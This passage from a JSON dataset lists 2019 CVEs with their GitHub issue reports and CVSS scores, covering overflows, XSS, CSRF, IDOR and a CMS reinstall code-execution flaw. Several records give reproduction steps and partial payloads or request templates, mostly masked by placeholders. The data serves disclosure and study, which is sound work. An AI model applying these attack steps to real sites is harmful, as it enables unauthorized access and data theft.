  38678. "CVE_ID": "CVE-2019-16346",
  38679. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/11",
  38680. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/11",
  38681. "Repo_new": "miniupnp/ngiflib",
  38682. "Issue_Created_At": "2019-04-13T13:37:39Z",
  38683. "description": "heap buffer overflow at APITAG in APITAG Tested in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bb NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38685. "severity": "HIGH",
  38686. "baseScore": 8.8,
  38687. "impactScore": 5.9,
  38688. "exploitabilityScore": 2.8
  38689. },
  38690. {
  38691. "CVE_ID": "CVE-2019-16347",
  38692. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/12",
  38693. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/12",
  38694. "Repo_new": "miniupnp/ngiflib",
  38695. "Issue_Created_At": "2019-04-13T13:39:52Z",
  38696. "description": "heap buffer overflow at APITAG in APITAG Test in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bb NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38698. "severity": "HIGH",
  38699. "baseScore": 8.8,
  38700. "impactScore": 5.9,
  38701. "exploitabilityScore": 2.8
  38702. },
  38703. {
  38704. "CVE_ID": "CVE-2019-16348",
  38705. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/24",
  38706. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/24",
  38707. "Repo_new": "marc-q/libwav",
  38708. "Issue_Created_At": "2019-08-15T08:01:41Z",
  38709. "description": "NULL Pointer Dereference in gain_file at APITAG Tested in Ubuntu NUMBERTAG bit, libwav (master NUMBERTAG cc NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38711. "severity": "MEDIUM",
  38712. "baseScore": 6.5,
  38713. "impactScore": 3.6,
  38714. "exploitabilityScore": 2.8
  38715. },
  38716. {
  38717. "CVE_ID": "CVE-2019-16349",
  38718. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/422",
  38719. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/422",
  38720. "Repo_new": "axiomatic-systems/bento4",
  38721. "Issue_Created_At": "2019-08-18T06:57:23Z",
  38722. "description": "NULL Pointer Dereference in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, Bento4(master cbebcc9) Triggered by cmd: APITAG POC file: URLTAG ASAN info: ERRORTAG",
  38723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38724. "severity": "MEDIUM",
  38725. "baseScore": 5.5,
  38726. "impactScore": 3.6,
  38727. "exploitabilityScore": 1.8
  38728. },
  38729. {
  38730. "CVE_ID": "CVE-2019-16350",
  38731. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/10",
  38732. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/10",
  38733. "Repo_new": "rockcarry/ffjpeg",
  38734. "Issue_Created_At": "2019-08-18T08:03:41Z",
  38735. "description": "NULL Pointer Dereference in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report CODETAG",
  38736. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38737. "severity": "MEDIUM",
  38738. "baseScore": 6.5,
  38739. "impactScore": 3.6,
  38740. "exploitabilityScore": 2.8
  38741. },
  38742. {
  38743. "CVE_ID": "CVE-2019-16351",
  38744. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/11",
  38745. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/11",
  38746. "Repo_new": "rockcarry/ffjpeg",
  38747. "Issue_Created_At": "2019-08-18T08:04:59Z",
  38748. "description": "SEGV in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report CODETAG",
  38749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38750. "severity": "MEDIUM",
  38751. "baseScore": 6.5,
  38752. "impactScore": 3.6,
  38753. "exploitabilityScore": 2.8
  38754. },
  38755. {
  38756. "CVE_ID": "CVE-2019-16352",
  38757. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/12",
  38758. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/12",
  38759. "Repo_new": "rockcarry/ffjpeg",
  38760. "Issue_Created_At": "2019-08-18T08:07:01Z",
  38761. "description": "APITAG heap buffer overflow in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report ERRORTAG",
  38762. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38763. "severity": "MEDIUM",
  38764. "baseScore": 6.5,
  38765. "impactScore": 3.6,
  38766. "exploitabilityScore": 2.8
  38767. },
  38768. {
  38769. "CVE_ID": "CVE-2019-16354",
  38770. "Issue_Url_old": "https://github.com/astaxie/beego/issues/3763",
  38771. "Issue_Url_new": "https://github.com/astaxie/beego/issues/3763",
  38772. "Repo_new": "astaxie/beego",
  38773. "Issue_Created_At": "2019-08-14T17:35:56Z",
  38774. "description": "File Session Managment permission problem. Please answer these questions before submitting your issue. Thanks! Dear beego Team, I would like to report a security vulnerability in Beego's session. There is a problem with file permission when on the File Session Manager that allows (OS) regular access system to access the session folder and potential read session files. The problem can be found on sess_file.go on the APITAG function, where a folder is created based on the provided sid with a NUMBERTAG permission mask, allowing every use on the system to access the folder, create and remove files. func (fp APITAG APITAG string) APITAG error) { func (fp APITAG APITAG string) APITAG error) { APITAG defer APITAG err := APITAG string(sid NUMBERTAG string(sid NUMBERTAG It later tries to do a stat to see if the session file is there and open or created the session file based on that. A race condition could be generated where a user will try to create it as soon as the folder was created, owning the file and being able to modify later. If that is not achieved, there is still a problem with the file creation. f, err = APITAG string(sid NUMBERTAG string(sid NUMBERTAG sid)) according to documentation APITAG creates the named file with mode NUMBERTAG before umask), truncating it if it already exists\", which could also potentially allow a regular user to read the content of the file (again, from inside the Operating System). Keep in mind, that similar behavior occurs on the APITAG function that should be addressed. However, it's important to notice as the documentation describes that APITAG will apply umask to the permission mode. In ubuntu, for example, that will end up in NUMBERTAG permission (unless someone changes it), still that makes the file readable and allow users in the OS to read the file's content. Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you,",
  38775. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38776. "severity": "MEDIUM",
  38777. "baseScore": 4.7,
  38778. "impactScore": 3.6,
  38779. "exploitabilityScore": 1.0
  38780. },
  38781. {
  38782. "CVE_ID": "CVE-2019-16366",
  38783. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/235",
  38784. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/235",
  38785. "Repo_new": "moddable-opensource/moddable",
  38786. "Issue_Created_At": "2019-07-25T07:08:13Z",
  38787. "description": "XS: Heap Buffer Overflow . Hello, We find a heap buffer overflow vulnerability in XS NUMBERTAG which is reported by Address Sanitizer. We compile and run the xs in linu NUMBERTAG The simplified js code: ERRORTAG Output of executing './xst s crash.js' ERRORTAG According to the report, APITAG access memory which should not be allowed. You can get the report too, if you compile XS with fsanitize option, then just run the xst with the js. Modify PATHTAG add \" fsanitize=address\" into C_OPTIONS (line NUMBERTAG and LINK_OPTIONS (line NUMBERTAG then make it, you will get the xst in /lin/debug which has been instrumented with APITAG Built in Security Lab APITAG",
  38788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38789. "severity": "CRITICAL",
  38790. "baseScore": 9.8,
  38791. "impactScore": 5.9,
  38792. "exploitabilityScore": 3.9
  38793. },
  38794. {
  38795. "CVE_ID": "CVE-2019-16377",
  38796. "Issue_Url_old": "https://github.com/makandra/consul/issues/49",
  38797. "Issue_Url_new": "https://github.com/makandra/consul/issues/49",
  38798. "Repo_new": "makandra/consul",
  38799. "Issue_Created_At": "2019-09-23T09:40:52Z",
  38800. "description": "Security vulnerability: Multiple powers in one controller are not always checked correctly. We have identified a security issue in consul. When a controller has multiple power directives, the :only and :except options of the last directive is applied to all directives. This can lead to unauthenticated access to certain controller actions. Affected versions NUMBERTAG Fixed versions NUMBERTAG Affected code looks like this: APITAG In this example both the powers :foo and :bar are only checked for the index action. Other actions were left unprotected by powers checks. Controllers with a single power directive are unaffected. Controllers where neither power uses :only or :except options are unaffected. This vulnerability has been assigned the CVE identifier CVETAG .",
  38801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38802. "severity": "CRITICAL",
  38803. "baseScore": 9.8,
  38804. "impactScore": 5.9,
  38805. "exploitabilityScore": 3.9
  38806. },
  38807. {
  38808. "CVE_ID": "CVE-2019-16403",
  38809. "Issue_Url_old": "https://github.com/bagisto/bagisto/issues/749",
  38810. "Issue_Url_new": "https://github.com/bagisto/bagisto/issues/749",
  38811. "Repo_new": "bagisto/bagisto",
  38812. "Issue_Created_At": "2019-03-27T12:52:24Z",
  38813. "description": "broken access control. Threat: sensitive data disclosure Risk level: HIGH Complexity: medium Vulnerable functions: Bagisto front end The list of functionality mentioned below are designed for customers to change their own values such as address, review etc can also be manipulated by other customers NUMBERTAG Address field: PATHTAG item_value NUMBERTAG Review: PATHTAG item_value NUMBERTAG Orders: PATHTAG item_value ] Tool Used: Burp proxy (to manipulate requests) Steps to reproduce the attack NUMBERTAG Address field: step NUMBERTAG create two users user NUMBERTAG EMAILTAG user NUMBERTAG EMAILTAG (default user on demo) step NUMBERTAG Add multiple address to both the users and check their id. step NUMBERTAG Edit the address using another users address id which will show you the address of that user. User1 can PATHTAG address of User2 and vice versa. Similarly, same technique can be used to exploit other functions NUMBERTAG Product review: Review id can be changed to another user's review id to delete review made by another user NUMBERTAG Orders : Order id can be changed to view orders made by another user. Impacts of vulnerability: Sensitive data disclosure where an user can easily view another user's data. Reference: URLTAG FILETAG",
  38814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  38815. "severity": "HIGH",
  38816. "baseScore": 8.8,
  38817. "impactScore": 5.9,
  38818. "exploitabilityScore": 2.8
  38819. },
  38820. {
  38821. "CVE_ID": "CVE-2019-16510",
  38822. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/164",
  38823. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/164",
  38824. "Repo_new": "mz-automation/libiec61850",
  38825. "Issue_Created_At": "2019-09-09T18:14:27Z",
  38826. "description": "Heap use after free in server_example_goose. Hello we found Heap user after free vulnerability in server_example_goose binary. Below are steps followed to reproduce crash Download latest source code from : FILETAG and compiled using ASAN (cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address fsanitize=leak g ggdb fno omit frame pointer static libstdc++ static libasan\" DCMAKE_C_FLAGS=\" fsanitize=address fsanitize=leak g ggdb fno omit frame pointer static libstdc++ static libasan\") GDB Output ERRORTAG ASAN Output ERRORTAG",
  38827. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38828. "severity": "HIGH",
  38829. "baseScore": 7.5,
  38830. "impactScore": 3.6,
  38831. "exploitabilityScore": 3.9
  38832. },
  38833. {
  38834. "CVE_ID": "CVE-2019-16520",
  38835. "Issue_Url_old": "https://github.com/semperfiwebdesign/all-in-one-seo-pack/issues/2888",
  38836. "Issue_Url_new": "https://github.com/awesomemotive/all-in-one-seo-pack/issues/2888",
  38837. "Repo_new": "awesomemotive/all-in-one-seo-pack",
  38838. "Issue_Created_At": "2019-09-10T13:25:27Z",
  38839. "description": "Escape meta description output.",
  38840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38841. "severity": "MEDIUM",
  38842. "baseScore": 5.4,
  38843. "impactScore": 2.7,
  38844. "exploitabilityScore": 2.3
  38845. },
  38846. {
  38847. "CVE_ID": "CVE-2019-16532",
  38848. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/28",
  38849. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/28",
  38850. "Repo_new": "yzmcms/yzmcms",
  38851. "Issue_Created_At": "2019-09-22T05:40:02Z",
  38852. "description": "About APITAG NUMBERTAG APITAG Header Injection. Host header injection vulnerability found on APITAG NUMBERTAG Using this attack, a malicious user can poison the web cache or arbitrary user re direction. APITAG Test Environment: Windows NUMBERTAG SP NUMBERTAG bit) XAMPP NUMBERTAG APITAG NUMBERTAG Access Path: PATHTAG root APITAG curl URLTAG H APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG {padding NUMBERTAG margin NUMBERTAG body{background: fff;color NUMBERTAG font APITAG APITAG Sans APITAG APITAG Micro APITAG serif;} msg{border NUMBERTAG px solid APITAG NUMBERTAG p NUMBERTAG px;padding NUMBERTAG px;line height NUMBERTAG px;text align:center;font size NUMBERTAG px;background: fff;} msgtit{height NUMBERTAG px;line height NUMBERTAG px;color: fff;background NUMBERTAG eb NUMBERTAG e;} msgbody{margin NUMBERTAG p NUMBERTAG text align:center} info{margin bottom NUMBERTAG px;} msgbody p{font size NUMBERTAG px;} msgbody p a{font size NUMBERTAG px;color NUMBERTAG text decoration:none;} msgbody p a:hover{color NUMBERTAG a NUMBERTAG de;} APITAG APITAG APITAG APITAG APITAG \u63d0\u793a\u4fe1\u606f APITAG APITAG APITAG \u8bf7\u5148\u767b\u5f55\uff01 APITAG APITAG \u672c\u9875\u9762\u5c06\u5728 APITAG NUMBERTAG APITAG \u79d2\u540e\u8df3\u8f6c... APITAG APITAG APITAG APITAG APITAG root APITAG FILETAG Or if we capture this in burp: FILETAG Then follow redirection FILETAG This will be re directed to APITAG with ERRORTAG responds. Capture the responds and open the browser will show following: FILETAG",
  38853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38854. "severity": "MEDIUM",
  38855. "baseScore": 6.1,
  38856. "impactScore": 2.7,
  38857. "exploitabilityScore": 2.8
  38858. },
  38859. {
  38860. "CVE_ID": "CVE-2019-16642",
  38861. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/6",
  38862. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/6",
  38863. "Repo_new": "yeyinshi/tuzicms",
  38864. "Issue_Created_At": "2019-09-17T04:45:42Z",
  38865. "description": "tuzicms APITAG I can't insert image to github NUMBERTAG PATHTAG ERRORTAG line NUMBERTAG and line NUMBERTAG This is a APITAG EXP: APITAG NUMBERTAG PATHTAG ERRORTAG line NUMBERTAG and line NUMBERTAG is a APITAG EXP: APITAG",
  38866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38867. "severity": "CRITICAL",
  38868. "baseScore": 9.8,
  38869. "impactScore": 5.9,
  38870. "exploitabilityScore": 3.9
  38871. },
  38872. {
  38873. "CVE_ID": "CVE-2019-16643",
  38874. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/54",
  38875. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/54",
  38876. "Repo_new": "94fzb/zrlog",
  38877. "Issue_Created_At": "2019-09-20T01:05:24Z",
  38878. "description": "There is a stored XSS in the article_edit area.",
  38879. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38880. "severity": "MEDIUM",
  38881. "baseScore": 5.4,
  38882. "impactScore": 2.7,
  38883. "exploitabilityScore": 2.3
  38884. },
  38885. {
  38886. "CVE_ID": "CVE-2019-16655",
  38887. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/441",
  38888. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/441",
  38889. "Repo_new": "joyplus/joyplus-cms",
  38890. "Issue_Created_At": "2019-09-03T04:56:06Z",
  38891. "description": "joyplus APITAG is a reload vulnerability in CMS NUMBERTAG describe\uff1a There is a reload vulnerability in APITAG the installation file was not deleted\u3002An attacker can overwrite the original system database and content by reinstalling the system\u3002 url\uff1a URLTAG NUMBERTAG main body First open install FILETAG stand alone next FILETAG Re enter yourself data FILETAG end\uff0creload vulnerability FILETAG NUMBERTAG Code audit The deletion was commented by the author. FILETAG",
  38892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  38893. "severity": "HIGH",
  38894. "baseScore": 7.5,
  38895. "impactScore": 3.6,
  38896. "exploitabilityScore": 3.9
  38897. },
  38898. {
  38899. "CVE_ID": "CVE-2019-16656",
  38900. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/442",
  38901. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/442",
  38902. "Repo_new": "joyplus/joyplus-cms",
  38903. "Issue_Created_At": "2019-09-03T05:29:10Z",
  38904. "description": "joyplus cms has code execution FILETAG NUMBERTAG describe\uff1a Code execution is possible due to a system reload vulnerability\u3002 This vulnerability can be getshell. url\uff1a URLTAG NUMBERTAG main body First create a name in the database\uff0cthe name is APITAG FILETAG Definition of database name using system reload vulnerabilities and next FILETAG Back to the previous step Enter payload again payload is APITAG APITAG \" and next FILETAG end FILETAG NUMBERTAG Code audit FILETAG",
  38905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38906. "severity": "CRITICAL",
  38907. "baseScore": 9.8,
  38908. "impactScore": 5.9,
  38909. "exploitabilityScore": 3.9
  38910. },
  38911. {
  38912. "CVE_ID": "CVE-2019-16657",
  38913. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/5",
  38914. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/5",
  38915. "Repo_new": "yeyinshi/tuzicms",
  38916. "Issue_Created_At": "2019-09-03T08:02:42Z",
  38917. "description": "tuzicms PATHTAG has xss NUMBERTAG tuzicms PATHTAG has xss NUMBERTAG PATHTAG (\"dudu\") PATHTAG NUMBERTAG end FILETAG",
  38918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38919. "severity": "MEDIUM",
  38920. "baseScore": 6.1,
  38921. "impactScore": 2.7,
  38922. "exploitabilityScore": 2.8
  38923. },
  38924. {
  38925. "CVE_ID": "CVE-2019-16658",
  38926. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/4",
  38927. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/4",
  38928. "Repo_new": "yeyinshi/tuzicms",
  38929. "Issue_Created_At": "2019-09-03T07:52:11Z",
  38930. "description": "tuzicms PATHTAG Cross station Request Forgery exists in the place of announcement management under conventional management NUMBERTAG Cross station Request Forgery exists in the place of announcement management under conventional management PATHTAG FILETAG NUMBERTAG payload\uff1a CODETAG NUMBERTAG end FILETAG",
  38931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38932. "severity": "HIGH",
  38933. "baseScore": 8.8,
  38934. "impactScore": 5.9,
  38935. "exploitabilityScore": 2.8
  38936. },
  38937. {
  38938. "CVE_ID": "CVE-2019-16659",
  38939. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/3",
  38940. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/3",
  38941. "Repo_new": "yeyinshi/tuzicms",
  38942. "Issue_Created_At": "2019-09-03T07:47:24Z",
  38943. "description": "APITAG site Request Forgery exists in routinely managed friendship links NUMBERTAG APITAG site Request Forgery exists in routinely managed friendship links FILETAG NUMBERTAG payload: CODETAG NUMBERTAG end FILETAG",
  38944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38945. "severity": "HIGH",
  38946. "baseScore": 8.8,
  38947. "impactScore": 5.9,
  38948. "exploitabilityScore": 2.8
  38949. },
  38950. {
  38951. "CVE_ID": "CVE-2019-16660",
  38952. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/440",
  38953. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/440",
  38954. "Repo_new": "joyplus/joyplus-cms",
  38955. "Issue_Created_At": "2019-09-03T04:37:51Z",
  38956. "description": "joyplus cms Cross site Request Forgery exists in the Player Management Office of System Management NUMBERTAG Cross site Request Forgery exists in the Player Management Office of System Management APITAG FILETAG payload\uff1a CODETAG end: FILETAG",
  38957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38958. "severity": "HIGH",
  38959. "baseScore": 8.8,
  38960. "impactScore": 5.9,
  38961. "exploitabilityScore": 2.8
  38962. },
  38963. {
  38964. "CVE_ID": "CVE-2019-16661",
  38965. "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/42",
  38966. "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/42",
  38967. "Repo_new": "n00dles/ogma-CMS",
  38968. "Issue_Created_At": "2019-09-20T05:35:42Z",
  38969. "description": "APITAG in ogma CMS NUMBERTAG iew Blogs Create New Blog Post. Affected software:ogma CMS NUMBERTAG Type of vulnerability: XSS APITAG APITAG Blogs Create New Blog Posthas APITAG payload\uff1a\"> APITAG alert NUMBERTAG APITAG aaaa click Create New Blog Post FILETAG Enter payload in the title of the page FILETAG save FILETAG Access page\uff1a URLTAG FILETAG Success",
  38970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38971. "severity": "MEDIUM",
  38972. "baseScore": 5.4,
  38973. "impactScore": 2.7,
  38974. "exploitabilityScore": 2.3
  38975. },
  38976. {
  38977. "CVE_ID": "CVE-2019-16664",
  38978. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/20",
  38979. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/20",
  38980. "Repo_new": "thinksaas/thinksaas",
  38981. "Issue_Created_At": "2019-09-21T13:23:47Z",
  38982. "description": "Stored xss when administrator edits posts in the same group, or just click a url. Stored xss when administrator edits posts in the same group, or just click a url APITAG Ways to reproduce NUMBERTAG admin1 creates a new group with the following request, notice that the malicious code has been injected in groupname param. APITAG POST APITAG HTTP NUMBERTAG Host: youdomain User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Cookie: Connection: close Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"groupname\" APITAG NUMBERTAG Content Disposition: form data; name=\"groupdesc\" aaaaaaaaaaaaaaa NUMBERTAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"tag\" aaaaaaaaaaaaaaa NUMBERTAG Content Disposition: form data; name=\"token\" APITAG NUMBERTAG admin1 invites admin2 as an administrator of this new group and post anything. PS: without agreement, one could invite anyone as his group adminstrator. APITAG NUMBERTAG once admin2 edits any posts in this group, or just click: URLTAG APITAG admin2 would execute the js code which had been injected in the group name NUMBERTAG admin2\u7ba1\u7406\u7ec4\u5185\u5e16\u5b50\u65f6\uff0c\u6216\u53ea\u662f\u70b9\u51fburl\uff1a URLTAG {\u4f60\u7684topic id\uff0c\u5f88\u5bb9\u6613\u83b7\u53d6} admin2\u5c06\u6267\u884c\u5df2\u7ecf\u88ab\u5d4c\u5165groupname\u4e2d\u7684js\u4ee3\u7801",
  38983. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  38984. "severity": "MEDIUM",
  38985. "baseScore": 4.8,
  38986. "impactScore": 2.7,
  38987. "exploitabilityScore": 1.7
  38988. },
  38989. {
  38990. "CVE_ID": "CVE-2019-16665",
  38991. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/21",
  38992. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/21",
  38993. "Repo_new": "thinksaas/thinksaas",
  38994. "Issue_Created_At": "2019-09-21T13:26:46Z",
  38995. "description": "Stored XSS in comments post. Stored XSS in comments post \u53d1\u8868\u8bc4\u8bba\u5904\u5b58\u50a8\u578bxss The comment part is vulnerable with js injected svg xss, which malicious js code may get executed. APITAG Ways to reproduce NUMBERTAG comment on any posts with malicious js code injected, like following NUMBERTAG POST APITAG HTTP NUMBERTAG Host: youdomain User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: Connection: close content= APITAG APITAG NUMBERTAG a alert box would pop, thus js code has been excuted NUMBERTAG js\u4ee3\u7801\u5df2\u7ecf\u6210\u529f\u6267\u884c",
  38996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38997. "severity": "MEDIUM",
  38998. "baseScore": 6.1,
  38999. "impactScore": 2.7,
  39000. "exploitabilityScore": 2.8
  39001. },
  39002. {
  39003. "CVE_ID": "CVE-2019-16669",
  39004. "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/935",
  39005. "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/935",
  39006. "Repo_new": "pagekit/pagekit",
  39007. "Issue_Created_At": "2019-09-18T08:14:46Z",
  39008. "description": "Security issue Pagekit's request password feature allows user acc enumeration. APITAG Problem Hi, When a user is requesting to reset his password using a valid email account, Pagekit gives the following response. FILETAG However, when an invalid email account is submitted, Pagekit notifies user that the particular email account cannot be found. FILETAG Leveraging on this, the attacker can use a list of emails to enumerate the valid user accounts based on the response of the server. Recommendation: It is recommended to give generic responses when user inputs his email address for recovery e.g. \"If this email exists, you will receive an email with the reset instructions.\" in order to prevent user account enumeration. OWASP ref: URLTAG Technical Details Pagekit version NUMBERTAG Webserver: APITAG Database: APITAG PHP Version NUMBERTAG",
  39009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  39010. "severity": "MEDIUM",
  39011. "baseScore": 5.3,
  39012. "impactScore": 1.4,
  39013. "exploitabilityScore": 3.9
  39014. },
  39015. {
  39016. "CVE_ID": "CVE-2019-16677",
  39017. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/76",
  39018. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/76",
  39019. "Repo_new": "idreamsoft/iCMS",
  39020. "Issue_Created_At": "2019-09-02T14:06:28Z",
  39021. "description": "A Sensitive operation CSRF vulnerability exists in iCMS NUMBERTAG Hello, a sensitive CSRF vulnerability was found in the background deletion administrator account. vulnerability url: URLTAG When I am missing CSRF_TOKEN and can still request normally, CSRF vulnerability exists vulnerability poc: CODETAG When POC is executed, all administrators except the initial administrator will be deleted\u3002 Hope it can help you.",
  39022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  39023. "severity": "MEDIUM",
  39024. "baseScore": 6.5,
  39025. "impactScore": 3.6,
  39026. "exploitabilityScore": 2.8
  39027. },
  39028. {
  39029. "CVE_ID": "CVE-2019-16678",
  39030. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/27",
  39031. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/27",
  39032. "Repo_new": "yzmcms/yzmcms",
  39033. "Issue_Created_At": "2019-09-20T08:57:08Z",
  39034. "description": "Denial of service attack caused by CSRF(CSRF\u9020\u6210\u7684\u62d2\u7edd\u670d\u52a1\u653b\u51fb). Hello, I found a vulnerability in your application. I call it a denial of service attack caused by CSRF. The point of vulnerability is the URL rule configuration. When I use CSRF to configure an illegal rule for administrators, the access routing of the whole station will be changed. That is to say, it is totally inaccessible and the site is in ERRORTAG status. APITAG priority is higher than the original admin/et al route). Attacks are shown as follows: No token check is used at the setup route. FILETAG the poc is: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG When the POC is executed, all routes of the site URLTAG are directed to URLTAG And we can define multiple routes in a link, so that all routes are customized and the whole station will crash so that it cannot be accessed. FILETAG FILETAG FILETAG FILETAG In Chinese\uff1a APITAG ERRORTAG \u72b6\u6001\u3002\uff08\u5176\u4f18\u5148\u7ea7\u9ad8\u4e8e\u539f\u672c\u7684admin/\u7b49\u8def\u7531\uff09\u3002 